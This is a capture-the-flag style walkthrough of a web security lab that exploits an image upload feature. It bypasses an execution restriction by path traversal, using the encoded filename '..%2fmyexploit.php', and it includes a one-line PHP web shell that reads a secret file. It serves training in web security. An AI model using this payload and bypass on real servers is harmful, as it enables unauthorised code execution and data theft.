Web Shell upload via path traversal is a vulnerability that allows an attacker to upload their malicious shell into a web application through path traversal. In this type of attack, the attacker first identifies a vulnerability in any web application that allows them to perform path traversal. Then, they access the directories for which they are not authorized. This is our 3rd Article about file upload Vulnerabilities. Here is the stepwise roadmap for file upload vulnerabilities.
Today, the lab we are solving contains an image upload function. The server has been configured in a way to prevent the execution of user-supplied files. However, we can bypass this restriction and exploit this vulnerability through a secondary vulnerability.
To solve this lab, we need to upload a PHP web shell and access the /home/carlos/secret file to obtain the key and solve the lab. The default credentials that we have are wiener:peter.
First, access the lab and log in using the default credentials. After logging in, enable your Burp Suite proxy. Then, upload a malicious file with a .php extension. I have named the malicious file as “myexploit.php”. In the screenshot above, you can see that I have highlighted two requests. The first request is a GET request that allows me to access the location of the image. The second request is a POST request that uploads the myexploit.php file. I will forward both of these requests to the repeater.
After sending the requests to the repeater, I renamed one of them to “UploadImage” which is our post-based request used for file upload. For the other request, which is based on the “GET” method and used for viewing the image location, I renamed it to “ShowImage”.
When I uploaded my malicious file, which is myexploit.php
<?php echo file_get_contents('/home/carlos/secret'); ?>
The file was uploaded successfully, but I am unable to access it through the browser. Instead, I see a blank screen, which indicates that the server has imposed some restrictions.
Bypassing File Upload Restriction
Now we will bypass this restriction. To do this, we will use ../. We have to modify the same post-based request that we used to upload the myexploit.php file. We will simply add ../ before /myexploit.php.
As you can see in the screenshot, I have changed the filename to “../exploit.php”. But that is not enough, we have to obfuscate the forward-slash (/). The obfuscated value of forward slash / is %2f. Therefore, I have modified the name of the filename to ” ..%2fmyexploit.php”. Now forward this request and go to ShowImage.
In the “Show Image” tab, modify the value of GET /files/avatars/myexploit.php and remove the /avatars section because we need to access our PHP shell by going one directory back.
Now you can see that I am able to access the “files” directory by going one directory back. I have also obtained the key.
Congratulations, the lab was solved after I submitted the key.